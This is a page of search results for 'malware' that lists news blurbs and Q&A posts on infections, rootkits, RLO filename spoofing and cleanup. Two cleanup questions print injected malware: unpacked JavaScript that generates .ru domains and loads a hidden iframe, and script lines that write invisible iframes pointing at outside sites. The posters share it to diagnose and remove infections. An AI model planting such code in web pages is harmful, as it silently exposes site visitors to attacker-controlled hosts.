Search Results

Search found 639 results on 26 pages for 'malware'.

Page 5/26

  • Digitally Signed Malware on the Rise

    Brought to the forefront in 2010 with Stuxnet, the infamous worm aimed at sabotaging industrial infrastructure, the use of stolen digital certificates is relatively new. Stuxnet's creators digitally signed its rootkit components with stolen certificates from JMicron and RealTek, a pair of semiconductor manufacturers. The worm's existence and complexity caught the security community by surprise. In fact, many researchers predicted that malware creators would begin adopting the same technique to work around driver signature enforcement employed by Microsoft in its 64-bit versions of Windows V...

    Read the article

  • Week in Geek: Botnet Epidemic Fueled by Malware Toolkits Edition

    - by Asian Angel
    This week we learned how to stream media files from any PC to a PlayStation, enable user-specific wireless networks in Windows 7, monitor the bandwidth consumption of individual applications, configure the Linux Grub2 Boot Menu the easy way, “add Dropbox to the Start Menu, understand symbolic links, & rip TV Series DVDs into episode files”, and more.

    Read the article

  • Crisis: the first malware to target virtual machines on Windows

    Crisis: the first malware to target virtual machines on Windows. Previously known as Morcut, "Crisis" is a malicious rootkit that infects the Windows and Mac OS X operating systems. It gets in through a fake Adobe Flash Player installer hidden in a JAR archive digitally signed by VeriSign. The archive contains two executables, one for Mac OS X and another for Windows. According to the latest Symantec Security report, the malware spreads in the Windows environment by using the autorun mechanism of removable drives, and through installation components on Windows Mobile devices. Entr...

    Read the article

  • File association and msconfig broken. Malware?

    - by Moshe
    A friend of mine had an Acer laptop. It has Vista Home Basic. I can't get system properties open. Msconfig does not run. Also, exe filetype is asking me what program to run it with. How can I fix that? I'm running AVG now. Assuming nothing shows up, what are fixes to the above mentioned issues?

    Read the article

  • Is there any way to set up a malware-blocking transparent proxy on an Airport Extreme?

    - by Chris R
    I'd like to add some kind of easily-administered transparent HTTP proxy to my home network. Ideally, it would allow me to, for example, redirect web requests to blacklisted servers into nothing, block certain kinds of content, et al. My home network at the moment consists of a mac mini media server that could -- if the load wasn't huge -- fill this role as well, an Airport Extreme, and a mac laptop that is my main machine. I'm reasonably technically savvy, so don't spare the complicated answers.

    Read the article

  • What are ways to prevent files with the Right-to-Left Override Unicode character in their name (a malware spoofing method) from being written or read?

    - by galacticninja
    What are ways to avoid or prevent files with the RLO (Right-to-Left Override) Unicode character in their name (a malware method to spoof filenames) from being written or read in a Windows PC?

    More info on the RLO Unicode character here:
    http://www.fileformat.info/info/unicode/char/202e/index.htm
    http://en.wikipedia.org/wiki/Bi-directional_text

    Info on the RLO Unicode character when used by malware:
    http://www.ipa.jp/security/english/virus/press/201110/E_PR201110.html
    Mirror link: http://webcache.googleusercontent.com/search?q=cache:KasmfOvbVJ8J:www.ipa.jp/security/english/virus/press/201110/E_PR201110.html+&cd=1&hl=en&ct=clnk

    You can try this RLO character test webpage: http://www.fileformat.info/info/unicode/char/202e/browsertest.htm
    The RLO character is also already pasted in the 'Input Test' field in that webpage. Try typing there and notice that the characters you're typing are coming out in their reverse order (right-to-left, instead of left-to-right).

    In filenames, the RLO character can be specifically positioned in the filename to spoof or masquerade as having a filename or file extension that is different than what it actually has. (Will still be hidden even if 'Hide extensions for known filetypes' is unchecked.)

    The only info I can find that has info on how to prevent files with the RLO character from being run is from the Information Technology Promotion Agency, Japan website: http://www.ipa.jp/security/english/virus/press/201110/E_PR201110.html (Mirror link). They advised to use the Local Security Policy settings manager to block files with the RLO character in its name from being run.

    Can anyone recommend any other good solutions to prevent files with the RLO character in their names from being written or being read in the computer, or a way to alert the user if a file with the RLO character is detected?

    My OS is Windows 7, but I'll be looking for solutions for Windows XP, Vista and 7, or a solution that will work for all those OSes, to help people using those OSes too.

    Read the article

  • Got a malware on my hosting provider which infects JavaScript files .. how do I find the entry point?

    - by h3.
    This morning some sites which are hosted on the same server as me started triggering malware alerts and started to redirect traffic to external sites. I've found out that a line of packed JavaScript was added to many js files across the server. What the script does is pretty simple, but what I would like to know is if this malware is well known and how it infects servers and propagates.

    For the curious here's the javascript line in question:

    Once unpacked it looks like this:

        function nextRandomNumber(){
            var hi = this.seed / this.Q;
            var lo = this.seed % this.Q;
            var test = this.A * lo - this.R * hi;
            if(test > 0){
                this.seed = test;
            } else {
                this.seed = test + this.M;
            }
            return (this.seed * this.oneOverM);
        }

        function RandomNumberGenerator(unix){
            var d = new Date(unix*1000);
            var s = d.getHours() > 12 ? 1 : 0;
            this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
            this.A = 48271;
            this.M = 2147483647;
            this.Q = this.M / this.A;
            this.R = this.M % this.A;
            this.oneOverM = 1.0 / this.M;
            this.next = nextRandomNumber;
            return this;
        }

        function createRandomNumber(r, Min, Max){
            return Math.round((Max-Min) * r.next() + Min);
        }

        function generatePseudoRandomString(unix, length, zone){
            var rand = new RandomNumberGenerator(unix);
            var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
            var str = '';
            for(var i = 0; i < length; i ++ ){
                str += letters[createRandomNumber(rand, 0, letters.length - 1)];
            }
            return str + '.' + zone;
        }

        setTimeout(function(){
            try{
                if(typeof iframeWasCreated == "undefined"){
                    iframeWasCreated = true;
                    var unix = Math.round(+new Date()/1000);
                    var domainName = generatePseudoRandomString(unix, 16, 'ru');
                    ifrm = document.createElement("IFRAME");
                    ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=cx");
                    ifrm.style.width = "0px";
                    ifrm.style.height = "0px";
                    ifrm.style.visibility = "hidden";
                    document.body.appendChild(ifrm);
                }
            }catch(e){}
        }, 500);

    Read the article

  • Ouch, how to escape this in sed? Cleaning up iframe malware

    - by user1769783
    I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it. The strings are:

        <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
        <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>
        <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

    I can't seem to figure out how to escape the various characters in those lines... If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing "" in the .html files as well. Any help would be greatly appreciated!

    Read the article

  • Week in Geek: New Malware Steals Bitcoin Currency

    - by Asian Angel
    This week we learned how to easily change a dual-booting PC’s default OS, “extract audio from any video using VLC, sneak around paywalls, & delay Windows Live Mesh during boot”, shrink videos to fit an Android phone with VLC, fix damaged or broken audio cables, “decide between an ISO or TS folder, help Windows 7 remember folder locations, & convert books for the Kindle”, and more. Photo by Profound Whatever.

    Read the article

  • Week in Geek: Malware-Infected Web Sites Doubled Since Last Year

    - by Asian Angel
    This week we learned how to get spelling autocorrect across all applications on a Windows system, “diagnose DSL hang ups, extract media files from PowerPoint presentations, & restrict IE to a single website”, customize the Ubuntu bootloader screen, get smartphone-style word suggestion on Windows systems, learned what character encodings are and how they differ, and more. Photo by Profound Whatever.

    Read the article

  • Week in Geek: Malware for Android has Increased 472% since July

    - by Asian Angel
    This week we learned how to safely eject your USB devices from the desktop context menu, make the Kindle Fire Silk Browser *actually* fast, “disable Windows startup programs, use DNS names on your home network, & restore a vintage keyboard”, print or save a directory listing to a file, make your computer press a key every X seconds, and more.

    Read the article

  • Mobilizing A Community To Fight Malware

    Help Net Security: "The word about Immunet's free anti-virus solution is spreading fast. The agent installed on my computer tells me that there are currently 162,597 people in the Immunet Cloud, and that I'm protected from 12,637,576 threats"

    Read the article

  • I am starting to think that Prevx.com isn't a legit site...but here's my long-winded question

    - by cop1152
    I apologize in advance for the long-winded post. I posted it all because I believe it's informative and may be useful. Also, I posted my question at the end.

    Moments ago I was RDC to a file server in my home (from inside my home). I had opened Firefox and Googled for a manufacturer's website. Immediately after clicking the link, Firefox abruptly closed. This seemed odd to me, so I checked the running processes and discovered d.exe, e.exe, and f.exe running. I Googled these processes on a different machine and found them belonging to a key-logger/screen-capturer/trojan called defender.exe, which according to Prevx lives in c:\documents and settings\user\local settings\temp. (Prevx link http://www.prevx.com/filenames/147352809685142526-X1/DEFENDER32.EXE.html)

    Simultaneously, an obviously-spoofed Windows Firewall popup appeared on the server asking me to click ‘yes’ to update Windows Firewall. At this time I ended all rogue processes, emptied the temp folder, removed defender.exe from startup, and checked my registry and a few other locations. Before deleting Defender.exe I noted that it was created moments ago, just before Firefox crashed.

    I believe that I was ‘almost’ infected with this malware. I believe that it needed me to click the phony popup in order to complete infection because it wasn’t allowed to execute processes from the temp folder. After cleaning the machine, I restarted it and have been monitoring it for over an hour. I am debating on whether or not to restore the Windows partition (a separate physical drive from the data) or to just watch it for a while.

    I should mention that, because of the specs on this machine, I do not run antivirus software, but I know it well and inspect it regularly. It is a very old Compaq with a 400 MHz processor and 512 MB of RAM. I have a static IP and the server is in the DMZ running an FTP client and some HTTP server software. All files transferred to and stored on this machine are scanned for malware before transferring. Usually the machine only runs 19 processes and performs pretty well for its intended purpose.

    I posted the story so that you could be aware of a possible new piece of malware and how it acts, but I also have a question or two. First, over the last few months I have noticed that PREVX is listed at the top of most of my Google searches when researching malware, especially for new or obscure malware…and they always want you to purchase something. I don’t think they are one of the top AV companies, so it seems odd that they are always the top Google result. Does anyone have any experience with any of their products?

    Also, what sites do you rely on for malware researching? Recently, I have found it difficult to find good info because of HijackThis logs and other dead-end info cluttering up my searches.

    And lastly, besides antivirus, third-party firewall, etc., what settings would you use to lock down a machine to make it more secure in instances where a stubborn admin like myself refuses to run AV? Thanks.

    Read the article
